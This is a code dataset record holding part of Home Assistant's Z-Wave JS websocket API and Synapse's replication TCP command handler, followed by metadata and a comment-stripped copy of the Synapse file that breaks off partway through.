                    vol.Optional(FORCE_CONSOLE): cv.boolean,
                }
            ),
            # At least one field must be supplied, and `filename` is mandatory
            # when logging to file is being turned on.
            cv.has_at_least_one_key(
                ENABLED, FILENAME, FORCE_CONSOLE, LEVEL, LOG_TO_FILE
            ),
            filename_is_present_if_logging_to_file,
        ),
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_log_config(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Apply a partial log-config update to the Z-Wave JS driver."""
    await client.driver.async_update_log_config(LogConfig(**msg[CONFIG]))
    connection.send_result(
        msg[ID],
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/get_log_config",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_get_entry
async def websocket_get_log_config(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Return the driver's current log configuration as a plain dict."""
    connection.send_result(
        msg[ID],
        dataclasses.asdict(client.driver.log_config),
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/update_data_collection_preference",
        vol.Required(ENTRY_ID): str,
        vol.Required(OPTED_IN): bool,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_data_collection_preference(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Persist the telemetry opt-in choice and toggle driver statistics."""
    opted_in = msg[OPTED_IN]
    # Record the preference on the config entry first, then apply it.
    update_data_collection_preference(hass, entry, opted_in)
    if opted_in:
        await async_enable_statistics(client)
    else:
        await client.driver.async_disable_statistics()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/data_collection_status",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_data_collection_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Report the stored opt-in preference and whether statistics are enabled."""
    opted_in = entry.data.get(CONF_DATA_COLLECTION_OPTED_IN)
    enabled = await client.driver.async_is_statistics_enabled()
    connection.send_result(msg[ID], {OPTED_IN: opted_in, ENABLED: enabled})
class DumpView(HomeAssistantView):
    """HTTP view that dumps the raw Z-Wave JS server messages as JSON."""
    url = "/api/zwave_js/dump/{config_entry_id}"
    name = "api:zwave_js:dump"
    async def get(self, request: web.Request, config_entry_id: str) -> web.Response:
        """Return the full message dump for the given config entry.

        Admin-only; 400 if the entry is not loaded for this integration.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        hass = request.app["hass"]
        if config_entry_id not in hass.data[DOMAIN]:
            raise web_exceptions.HTTPBadRequest
        entry = hass.config_entries.async_get_entry(config_entry_id)
        # Opens a fresh connection to the zwave-js server to capture the dump.
        msgs = await dump.dump_msgs(entry.data[CONF_URL], async_get_clientsession(hass))
        # Serve as a downloadable JSON attachment.
        return web.Response(
            body=json.dumps(msgs, indent=2) + "\n",
            headers={
                hdrs.CONTENT_TYPE: "application/json",
                hdrs.CONTENT_DISPOSITION: 'attachment; filename="zwave_js_dump.json"',
            },
        )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/version_info",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_get_entry
async def websocket_version_info(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Report driver/server versions and the supported schema range."""
    version = client.version
    connection.send_result(
        msg[ID],
        {
            "driver_version": version.driver_version,
            "server_version": version.server_version,
            "min_schema_version": version.min_schema_version,
            "max_schema_version": version.max_schema_version,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/abort_firmware_update",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_abort_firmware_update(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Abort an in-progress firmware update on a node; reply with no payload."""
    await node.async_abort_firmware_update()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_firmware_update_status",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_subscribe_firmware_update_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Stream firmware-update progress/finished events for a node."""
    @callback
    def async_cleanup() -> None:
        """Remove the event listeners when the subscription ends."""
        for unsub in unsubs:
            unsub()
    @callback
    def forward_progress(event: dict) -> None:
        """Forward fragment-level progress of the firmware transfer."""
        progress: FirmwareUpdateProgress = event["firmware_update_progress"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "event": event["event"],
                    "sent_fragments": progress.sent_fragments,
                    "total_fragments": progress.total_fragments,
                },
            )
        )
    @callback
    def forward_finished(event: dict) -> None:
        """Forward the final status once the firmware update completes."""
        finished: FirmwareUpdateFinished = event["firmware_update_finished"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "event": event["event"],
                    "status": finished.status,
                    "wait_time": finished.wait_time,
                },
            )
        )
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        node.on("firmware update progress", forward_progress),
        node.on("firmware update finished", forward_finished),
    ]
    connection.subscriptions[msg["id"]] = async_cleanup
    connection.send_result(msg[ID])
class FirmwareUploadView(HomeAssistantView):
    """HTTP view that accepts a firmware file upload for a node."""
    url = r"/api/zwave_js/firmware/upload/{config_entry_id}/{node_id:\d+}"
    name = "api:zwave_js:firmware:upload"
    async def post(
        self, request: web.Request, config_entry_id: str, node_id: str
    ) -> web.Response:
        """Start a firmware update from an uploaded file.

        Admin-only; 400 for an unknown entry or malformed upload, 404 for an
        unknown node.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        hass = request.app["hass"]
        if config_entry_id not in hass.data[DOMAIN]:
            raise web_exceptions.HTTPBadRequest
        entry = hass.config_entries.async_get_entry(config_entry_id)
        client: Client = hass.data[DOMAIN][config_entry_id][DATA_CLIENT]
        node = client.driver.controller.nodes.get(int(node_id))
        if not node:
            raise web_exceptions.HTTPNotFound
        # NOTE(review): pokes aiohttp's private attribute to raise the upload
        # size limit to 10 MiB for this request only — fragile across aiohttp
        # upgrades; worth confirming there is no public knob for this.
        request._client_max_size = 1024 * 1024 * 10
        data = await request.post()
        if "file" not in data or not isinstance(data["file"], web_request.FileField):
            raise web_exceptions.HTTPBadRequest
        uploaded_file: web_request.FileField = data["file"]
        try:
            await begin_firmware_update(
                entry.data[CONF_URL],
                node,
                uploaded_file.filename,
                # File read is blocking; do it in the executor.
                await hass.async_add_executor_job(uploaded_file.file.read),
                async_get_clientsession(hass),
            )
        except BaseZwaveJSServerError as err:
            raise web_exceptions.HTTPBadRequest from err
        return self.json(None)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/check_for_config_updates",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_check_for_config_updates(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Ask the driver whether a device-config database update is available."""
    update_info = await client.driver.async_check_for_config_updates()
    connection.send_result(
        msg[ID],
        {
            "update_available": update_info.update_available,
            "new_version": update_info.new_version,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/install_config_update",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_install_config_update(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Install the pending device-config update; reply with success boolean."""
    success = await client.driver.async_install_config_update()
    connection.send_result(msg[ID], success)
| true | true |
1c303f3a46d81485b23495f71918a4a72f230c12 | 27,316 | py | Python | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | 1 | 2020-10-10T13:23:05.000Z | 2020-10-10T13:23:05.000Z | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | null | null | null | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2017 Vector Creations Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
)
from prometheus_client import Counter
from typing_extensions import Deque
from twisted.internet.protocol import ReconnectingClientFactory
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.tcp.client import DirectTcpReplicationClientFactory
from synapse.replication.tcp.commands import (
ClearUserSyncsCommand,
Command,
FederationAckCommand,
PositionCommand,
RdataCommand,
RemoteServerUpCommand,
RemovePusherCommand,
ReplicateCommand,
UserIpCommand,
UserSyncCommand,
)
from synapse.replication.tcp.protocol import AbstractConnection
from synapse.replication.tcp.streams import (
STREAMS_MAP,
BackfillStream,
CachesStream,
EventsStream,
FederationStream,
Stream,
TypingStream,
)
logger = logging.getLogger(__name__)
# Prometheus metrics for commands received over the replication TCP protocol.
# number of updates received for each RDATA stream
inbound_rdata_count = Counter(
    "synapse_replication_tcp_protocol_inbound_rdata_count", "", ["stream_name"]
)
user_sync_counter = Counter("synapse_replication_tcp_resource_user_sync", "")
federation_ack_counter = Counter("synapse_replication_tcp_resource_federation_ack", "")
remove_pusher_counter = Counter("synapse_replication_tcp_resource_remove_pusher", "")
user_ip_cache_counter = Counter("synapse_replication_tcp_resource_user_ip_cache", "")
# the type of the entries in _command_queues_by_stream
# (each entry pairs the queued command with the connection it arrived on)
_StreamCommandQueue = Deque[
    Tuple[Union[RdataCommand, PositionCommand], AbstractConnection]
]
class ReplicationCommandHandler:
    """Handles incoming commands from replication as well as sending commands
    back out to connections.
    """

    def __init__(self, hs):
        """Set up handler state and work out which streams this instance
        should act as a source for.

        Args:
            hs: the homeserver object, used to look up config and handlers.
        """
        self._replication_data_handler = hs.get_replication_data_handler()
        self._presence_handler = hs.get_presence_handler()
        self._store = hs.get_datastore()
        self._notifier = hs.get_notifier()
        self._clock = hs.get_clock()
        self._instance_id = hs.get_instance_id()
        self._instance_name = hs.get_instance_name()

        # All the streams the server knows about, keyed by stream name.
        self._streams = {
            stream.NAME: stream(hs) for stream in STREAMS_MAP.values()
        }  # type: Dict[str, Stream]

        # List of streams that this instance is the source of
        self._streams_to_replicate = []  # type: List[Stream]

        for stream in self._streams.values():
            if stream.NAME == CachesStream.NAME:
                # All workers can write to the cache invalidation stream.
                self._streams_to_replicate.append(stream)
                continue

            if isinstance(stream, (EventsStream, BackfillStream)):
                # Only add EventStream and BackfillStream as a source on the
                # instance in charge of event persistence.
                if hs.config.worker.writers.events == hs.get_instance_name():
                    self._streams_to_replicate.append(stream)
                continue

            if isinstance(stream, TypingStream):
                # Only add TypingStream as a source on the instance in charge of
                # typing.
                if hs.config.worker.writers.typing == hs.get_instance_name():
                    self._streams_to_replicate.append(stream)
                continue

            # Only add any other streams if we're on master.
            if hs.config.worker_app is not None:
                continue

            if stream.NAME == FederationStream.NAME and hs.config.send_federation:
                # We only support federation stream if federation sending
                # has been disabled on the master.
                continue

            self._streams_to_replicate.append(stream)

        # Map of stream name to batched updates. See RdataCommand for info on
        # how batching works.
        self._pending_batches = {}  # type: Dict[str, List[Any]]

        # The factory used to create connections.
        self._factory = None  # type: Optional[ReconnectingClientFactory]

        # The currently connected connections. (The list of places we need to send
        # outgoing replication commands to.)
        self._connections = []  # type: List[AbstractConnection]

        LaterGauge(
            "synapse_replication_tcp_resource_total_connections",
            "",
            [],
            lambda: len(self._connections),
        )

        # When POSITION or RDATA commands arrive, we stick them in a queue and process
        # them in order in a separate background process.

        # the streams which are currently being processed by _unsafe_process_queue
        self._processing_streams = set()  # type: Set[str]

        # for each stream, a queue of commands that are awaiting processing, and the
        # connection that they arrived on.
        self._command_queues_by_stream = {
            stream_name: _StreamCommandQueue() for stream_name in self._streams
        }

        # For each connection, the incoming stream names that have received a POSITION
        # from that connection.
        self._streams_by_connection = {}  # type: Dict[AbstractConnection, Set[str]]

        LaterGauge(
            "synapse_replication_tcp_command_queue",
            "Number of inbound RDATA/POSITION commands queued for processing",
            ["stream_name"],
            lambda: {
                (stream_name,): len(queue)
                for stream_name, queue in self._command_queues_by_stream.items()
            },
        )

        self._is_master = hs.config.worker_app is None

        # Only set on master when federation sending has not been moved off it.
        self._federation_sender = None
        if self._is_master and not hs.config.send_federation:
            self._federation_sender = hs.get_federation_sender()

        # Only set on master; relied upon by _handle_user_ip below.
        self._server_notices_sender = None
        if self._is_master:
            self._server_notices_sender = hs.get_server_notices_sender()

    def _add_command_to_stream_queue(
        self, conn: AbstractConnection, cmd: Union[RdataCommand, PositionCommand]
    ) -> None:
        """Queue the given received command for processing

        Adds the given command to the per-stream queue, and processes the queue if
        necessary
        """
        stream_name = cmd.stream_name
        queue = self._command_queues_by_stream.get(stream_name)
        if queue is None:
            logger.error("Got %s for unknown stream: %s", cmd.NAME, stream_name)
            return

        queue.append((cmd, conn))

        # if we're already processing this stream, there's nothing more to do:
        # the new entry on the queue will get picked up in due course
        if stream_name in self._processing_streams:
            return

        # fire off a background process to start processing the queue.
        run_as_background_process(
            "process-replication-data", self._unsafe_process_queue, stream_name
        )

    async def _unsafe_process_queue(self, stream_name: str):
        """Processes the command queue for the given stream, until it is empty

        Does not check if there is already a thread processing the queue, hence "unsafe"
        """
        assert stream_name not in self._processing_streams

        self._processing_streams.add(stream_name)
        try:
            queue = self._command_queues_by_stream.get(stream_name)
            while queue:
                cmd, conn = queue.popleft()
                try:
                    await self._process_command(cmd, conn, stream_name)
                except Exception:
                    # log and carry on: one bad command shouldn't wedge the queue
                    logger.exception("Failed to handle command %s", cmd)
        finally:
            self._processing_streams.discard(stream_name)

    async def _process_command(
        self,
        cmd: Union[PositionCommand, RdataCommand],
        conn: AbstractConnection,
        stream_name: str,
    ) -> None:
        """Dispatch a queued POSITION or RDATA command to its handler."""
        if isinstance(cmd, PositionCommand):
            await self._process_position(stream_name, conn, cmd)
        elif isinstance(cmd, RdataCommand):
            await self._process_rdata(stream_name, conn, cmd)
        else:
            # This shouldn't be possible
            # NOTE(review): the %s here is not interpolated -- cmd.NAME is
            # passed as a second Exception argument rather than formatted in.
            raise Exception("Unrecognised command %s in stream queue", cmd.NAME)

    def start_replication(self, hs):
        """Helper method to start a replication connection to the remote server
        using TCP.
        """
        if hs.config.redis.redis_enabled:
            import txredisapi

            from synapse.replication.tcp.redis import (
                RedisDirectTcpReplicationClientFactory,
            )

            logger.info(
                "Connecting to redis (host=%r port=%r)",
                hs.config.redis_host,
                hs.config.redis_port,
            )

            # First let's ensure that we have a ReplicationStreamer started.
            hs.get_replication_streamer()

            # We need two connections to redis, one for the subscription stream and
            # one to send commands to (as you can't send further redis commands to a
            # connection after SUBSCRIBE is called).

            # First create the connection for sending commands.
            outbound_redis_connection = txredisapi.lazyConnection(
                host=hs.config.redis_host,
                port=hs.config.redis_port,
                password=hs.config.redis.redis_password,
                reconnect=True,
            )

            # Now create the factory/connection for the subscription stream.
            self._factory = RedisDirectTcpReplicationClientFactory(
                hs, outbound_redis_connection
            )
            hs.get_reactor().connectTCP(
                hs.config.redis.redis_host, hs.config.redis.redis_port, self._factory,
            )
        else:
            client_name = hs.get_instance_name()
            self._factory = DirectTcpReplicationClientFactory(hs, client_name, self)
            host = hs.config.worker_replication_host
            port = hs.config.worker_replication_port
            hs.get_reactor().connectTCP(host, port, self._factory)

    def get_streams(self) -> Dict[str, Stream]:
        """Get a map from stream name to all streams.
        """
        return self._streams

    def get_streams_to_replicate(self) -> List[Stream]:
        """Get a list of streams that this instance replicates.
        """
        return self._streams_to_replicate

    def on_REPLICATE(self, conn: AbstractConnection, cmd: ReplicateCommand):
        """Called when a connection asks us to replicate: respond with our
        current positions for all streams we are a source of.
        """
        self.send_positions_to_connection(conn)

    def send_positions_to_connection(self, conn: AbstractConnection):
        """Send current position of all streams this process is source of to
        the connection.
        """

        # We respond with current position of all streams this instance
        # replicates.
        for stream in self.get_streams_to_replicate():
            self.send_command(
                PositionCommand(
                    stream.NAME,
                    self._instance_name,
                    stream.current_token(self._instance_name),
                )
            )

    def on_USER_SYNC(
        self, conn: AbstractConnection, cmd: UserSyncCommand
    ) -> Optional[Awaitable[None]]:
        """Called when an instance tells us a user has started/stopped syncing.

        Only acted on on master (where presence is tracked); returns an
        awaitable to run, or None.
        """
        user_sync_counter.inc()

        if self._is_master:
            return self._presence_handler.update_external_syncs_row(
                cmd.instance_id, cmd.user_id, cmd.is_syncing, cmd.last_sync_ms
            )
        else:
            return None

    def on_CLEAR_USER_SYNC(
        self, conn: AbstractConnection, cmd: ClearUserSyncsCommand
    ) -> Optional[Awaitable[None]]:
        """Called when an instance asks us to clear all its user-sync data.

        Only acted on on master; returns an awaitable to run, or None.
        """
        if self._is_master:
            return self._presence_handler.update_external_syncs_clear(cmd.instance_id)
        else:
            return None

    def on_FEDERATION_ACK(self, conn: AbstractConnection, cmd: FederationAckCommand):
        """Called when an instance acks federation stream data up to the given
        token: forwarded to the federation sender, if this instance has one.
        """
        federation_ack_counter.inc()

        if self._federation_sender:
            self._federation_sender.federation_ack(cmd.instance_name, cmd.token)

    def on_REMOVE_PUSHER(
        self, conn: AbstractConnection, cmd: RemovePusherCommand
    ) -> Optional[Awaitable[None]]:
        """Called when an instance asks us to remove a pusher for a user.

        Only acted on on master; returns an awaitable to run, or None.
        """
        remove_pusher_counter.inc()

        if self._is_master:
            return self._handle_remove_pusher(cmd)
        else:
            return None

    async def _handle_remove_pusher(self, cmd: RemovePusherCommand):
        """Delete the given pusher from the database and wake up the notifier."""
        await self._store.delete_pusher_by_app_id_pushkey_user_id(
            app_id=cmd.app_id, pushkey=cmd.push_key, user_id=cmd.user_id
        )

        self._notifier.on_new_replication_data()

    def on_USER_IP(
        self, conn: AbstractConnection, cmd: UserIpCommand
    ) -> Optional[Awaitable[None]]:
        """Called when an instance reports a client's IP/user-agent activity.

        Only acted on on master; returns an awaitable to run, or None.
        """
        user_ip_cache_counter.inc()

        if self._is_master:
            return self._handle_user_ip(cmd)
        else:
            return None

    async def _handle_user_ip(self, cmd: UserIpCommand):
        """Record the client connection details in the database and tell the
        server notices sender about the user activity.
        """
        await self._store.insert_client_ip(
            cmd.user_id,
            cmd.access_token,
            cmd.ip,
            cmd.user_agent,
            cmd.device_id,
            cmd.last_seen,
        )

        # only called on master (see on_USER_IP), where __init__ always sets
        # the server notices sender.
        assert self._server_notices_sender is not None
        await self._server_notices_sender.on_user_ip(cmd.user_id)

    def on_RDATA(self, conn: AbstractConnection, cmd: RdataCommand):
        """Called when we receive a row of replication data for a stream:
        queues it for ordered, per-stream processing.
        """
        if cmd.instance_name == self._instance_name:
            # Ignore RDATA that are just our own echoes
            return

        stream_name = cmd.stream_name
        inbound_rdata_count.labels(stream_name).inc()

        # We put the received command into a queue here for two reasons:
        #   1. so we don't try and concurrently handle multiple rows for the
        #      same stream, and
        #   2. so we don't race with getting a POSITION command and fetching
        #      missing RDATA.
        self._add_command_to_stream_queue(conn, cmd)

    async def _process_rdata(
        self, stream_name: str, conn: AbstractConnection, cmd: RdataCommand
    ) -> None:
        """Process an RDATA command

        Called after the command has been popped off the queue of inbound commands
        """
        try:
            row = STREAMS_MAP[stream_name].parse_row(cmd.row)
        except Exception as e:
            raise Exception(
                "Failed to parse RDATA: %r %r" % (stream_name, cmd.row)
            ) from e

        # make sure that we've processed a POSITION for this stream *on this
        # connection*. (A POSITION on another connection is no good, as there
        # is no guarantee that we have seen all the intermediate updates.)
        sbc = self._streams_by_connection.get(conn)
        if not sbc or stream_name not in sbc:
            # Let's drop the row for now, on the assumption we'll receive a
            # `POSITION` soon and we'll catch up correctly then.
            logger.debug(
                "Discarding RDATA for unconnected stream %s -> %s",
                stream_name,
                cmd.token,
            )
            return

        if cmd.token is None:
            # I.e. this is part of a batch of updates for this stream (in
            # which case batch until we get an update for the stream with a non
            # None token).
            self._pending_batches.setdefault(stream_name, []).append(row)
            return

        # Check if this is the last of a batch of updates
        rows = self._pending_batches.pop(stream_name, [])
        rows.append(row)

        stream = self._streams[stream_name]

        # Find where we previously streamed up to.
        current_token = stream.current_token(cmd.instance_name)

        # Discard this data if this token is earlier than the current
        # position. Note that streams can be reset (in which case you
        # expect an earlier token), but that must be preceded by a
        # POSITION command.
        if cmd.token <= current_token:
            logger.debug(
                "Discarding RDATA from stream %s at position %s before previous position %s",
                stream_name,
                cmd.token,
                current_token,
            )
        else:
            await self.on_rdata(stream_name, cmd.instance_name, cmd.token, rows)

    async def on_rdata(
        self, stream_name: str, instance_name: str, token: int, rows: list
    ):
        """Called to handle a batch of replication data with a given stream token.

        Args:
            stream_name: name of the replication stream for this batch of rows
            instance_name: the instance that wrote the rows.
            token: stream token for this batch of rows
            rows: a list of Stream.ROW_TYPE objects as returned by
                Stream.parse_row.
        """
        logger.debug("Received rdata %s (%s) -> %s", stream_name, instance_name, token)
        await self._replication_data_handler.on_rdata(
            stream_name, instance_name, token, rows
        )

    def on_POSITION(self, conn: AbstractConnection, cmd: PositionCommand):
        """Called when a connection reports its current position for a stream:
        queues it for ordered, per-stream processing.
        """
        if cmd.instance_name == self._instance_name:
            # Ignore POSITION that are just our own echoes
            return

        logger.info("Handling '%s %s'", cmd.NAME, cmd.to_line())

        self._add_command_to_stream_queue(conn, cmd)

    async def _process_position(
        self, stream_name: str, conn: AbstractConnection, cmd: PositionCommand
    ) -> None:
        """Process a POSITION command

        Called after the command has been popped off the queue of inbound commands
        """
        stream = self._streams[stream_name]

        # We're about to go and catch up with the stream, so remove from set
        # of connected streams.
        for streams in self._streams_by_connection.values():
            streams.discard(stream_name)

        # We clear the pending batches for the stream as the fetching of the
        # missing updates below will fetch all rows in the batch.
        self._pending_batches.pop(stream_name, [])

        # Find where we previously streamed up to.
        current_token = stream.current_token(cmd.instance_name)

        # If the position token matches our current token then we're up to
        # date and there's nothing to do. Otherwise, fetch all updates
        # between then and now.
        missing_updates = cmd.token != current_token
        while missing_updates:
            logger.info(
                "Fetching replication rows for '%s' between %i and %i",
                stream_name,
                current_token,
                cmd.token,
            )
            (updates, current_token, missing_updates) = await stream.get_updates_since(
                cmd.instance_name, current_token, cmd.token
            )

            # TODO: add some tests for this

            # Some streams return multiple rows with the same stream IDs,
            # which need to be processed in batches.
            for token, rows in _batch_updates(updates):
                await self.on_rdata(
                    stream_name,
                    cmd.instance_name,
                    token,
                    [stream.parse_row(row) for row in rows],
                )

        logger.info("Caught up with stream '%s' to %i", stream_name, cmd.token)

        # We've now caught up to position sent to us, notify handler.
        await self._replication_data_handler.on_position(
            cmd.stream_name, cmd.instance_name, cmd.token
        )

        self._streams_by_connection.setdefault(conn, set()).add(stream_name)

    def on_REMOTE_SERVER_UP(self, conn: AbstractConnection, cmd: RemoteServerUpCommand):
        """Called when we get a new REMOTE_SERVER_UP command."""
        self._replication_data_handler.on_remote_server_up(cmd.data)

        self._notifier.notify_remote_server_up(cmd.data)

        # We relay to all other connections to ensure every instance gets the
        # notification.
        #
        # When configured to use redis we'll always only have one connection and
        # so this is a no-op (all instances will have already received the same
        # REMOTE_SERVER_UP command).
        #
        # For direct TCP connections this will relay to all other connections
        # connected to us. When on master this will correctly fan out to all
        # other direct TCP clients and on workers there'll only be the one
        # connection to master.
        #
        # (The logic here should also be sound if we have a mix of Redis and
        # direct TCP connections so long as there is only one traffic route
        # between two instances, but that is not currently supported).
        self.send_command(cmd, ignore_conn=conn)

    def new_connection(self, connection: AbstractConnection):
        """Called when we have a new connection.
        """
        self._connections.append(connection)

        # If we are connected to replication as a client (rather than a server)
        # we need to reset the reconnection delay on the client factory (which
        # is used to do exponential back off when the connection drops).
        #
        # Ideally we would reset the delay when we've "fully established" the
        # connection (for some definition thereof) to stop us from tightlooping
        # on reconnection if something fails after this point and we drop the
        # connection. Unfortunately, we don't really have a better definition of
        # "fully established" than the connection being established.
        if self._factory:
            self._factory.resetDelay()

        # Tell the other end if we have any users currently syncing.
        currently_syncing = (
            self._presence_handler.get_currently_syncing_users_for_replication()
        )

        now = self._clock.time_msec()
        for user_id in currently_syncing:
            connection.send_command(
                UserSyncCommand(self._instance_id, user_id, True, now)
            )

    def lost_connection(self, connection: AbstractConnection):
        """Called when a connection is closed/lost.
        """
        # we no longer need _streams_by_connection for this connection.
        streams = self._streams_by_connection.pop(connection, None)
        if streams:
            logger.info(
                "Lost replication connection; streams now disconnected: %s", streams
            )

        try:
            self._connections.remove(connection)
        except ValueError:
            pass

    def connected(self) -> bool:
        """Do we have any replication connections open?

        Is used by e.g. `ReplicationStreamer` to no-op if nothing is connected.
        """
        return bool(self._connections)

    def send_command(
        self, cmd: Command, ignore_conn: Optional[AbstractConnection] = None
    ):
        """Send a command to all connected connections.

        Args:
            cmd: the command to send
            ignore_conn: If set don't send command to the given connection.
                Used when relaying commands from one connection to all others.
        """
        if self._connections:
            for connection in self._connections:
                if connection == ignore_conn:
                    continue

                try:
                    connection.send_command(cmd)
                except Exception:
                    # We probably want to catch some types of exceptions here
                    # and log them as warnings (e.g. connection gone), but I
                    # can't find what those exception types they would be.
                    logger.exception(
                        "Failed to write command %s to connection %s",
                        cmd.NAME,
                        connection,
                    )
        else:
            logger.warning("Dropping command as not connected: %r", cmd.NAME)

    def send_federation_ack(self, token: int):
        """Ack data for the federation stream. This allows the master to drop
        data stored purely in memory.
        """
        self.send_command(FederationAckCommand(self._instance_name, token))

    def send_user_sync(
        self, instance_id: str, user_id: str, is_syncing: bool, last_sync_ms: int
    ):
        """Poke the master that a user has started/stopped syncing.
        """
        self.send_command(
            UserSyncCommand(instance_id, user_id, is_syncing, last_sync_ms)
        )

    def send_remove_pusher(self, app_id: str, push_key: str, user_id: str):
        """Poke the master to remove a pusher for a user
        """
        cmd = RemovePusherCommand(app_id, push_key, user_id)
        self.send_command(cmd)

    def send_user_ip(
        self,
        user_id: str,
        access_token: str,
        ip: str,
        user_agent: str,
        device_id: str,
        last_seen: int,
    ):
        """Tell the master that the user made a request.
        """
        cmd = UserIpCommand(user_id, access_token, ip, user_agent, device_id, last_seen)
        self.send_command(cmd)

    def send_remote_server_up(self, server: str):
        """Relay to all connections that a remote server has come back up."""
        self.send_command(RemoteServerUpCommand(server))

    def stream_update(self, stream_name: str, token: str, data: Any):
        """Called when a new update is available to stream to clients.

        We need to check if the client is interested in the stream or not
        """
        self.send_command(RdataCommand(stream_name, self._instance_name, token, data))
UpdateToken = TypeVar("UpdateToken")
UpdateRow = TypeVar("UpdateRow")
def _batch_updates(
updates: Iterable[Tuple[UpdateToken, UpdateRow]]
) -> Iterator[Tuple[UpdateToken, List[UpdateRow]]]:
"""Collect stream updates with the same token together
Given a series of updates returned by Stream.get_updates_since(), collects
the updates which share the same stream_id together.
For example:
[(1, a), (1, b), (2, c), (3, d), (3, e)]
becomes:
[
(1, [a, b]),
(2, [c]),
(3, [d, e]),
]
"""
update_iter = iter(updates)
first_update = next(update_iter, None)
if first_update is None:
# empty input
return
current_batch_token = first_update[0]
current_batch = [first_update[1]]
for token, row in update_iter:
if token != current_batch_token:
# different token to the previous row: flush the previous
# batch and start anew
yield current_batch_token, current_batch
current_batch_token = token
current_batch = []
current_batch.append(row)
# flush the final batch
yield current_batch_token, current_batch
| 36.814016 | 93 | 0.633145 |
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
)
from prometheus_client import Counter
from typing_extensions import Deque
from twisted.internet.protocol import ReconnectingClientFactory
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.tcp.client import DirectTcpReplicationClientFactory
from synapse.replication.tcp.commands import (
ClearUserSyncsCommand,
Command,
FederationAckCommand,
PositionCommand,
RdataCommand,
RemoteServerUpCommand,
RemovePusherCommand,
ReplicateCommand,
UserIpCommand,
UserSyncCommand,
)
from synapse.replication.tcp.protocol import AbstractConnection
from synapse.replication.tcp.streams import (
STREAMS_MAP,
BackfillStream,
CachesStream,
EventsStream,
FederationStream,
Stream,
TypingStream,
)
logger = logging.getLogger(__name__)
inbound_rdata_count = Counter(
"synapse_replication_tcp_protocol_inbound_rdata_count", "", ["stream_name"]
)
user_sync_counter = Counter("synapse_replication_tcp_resource_user_sync", "")
federation_ack_counter = Counter("synapse_replication_tcp_resource_federation_ack", "")
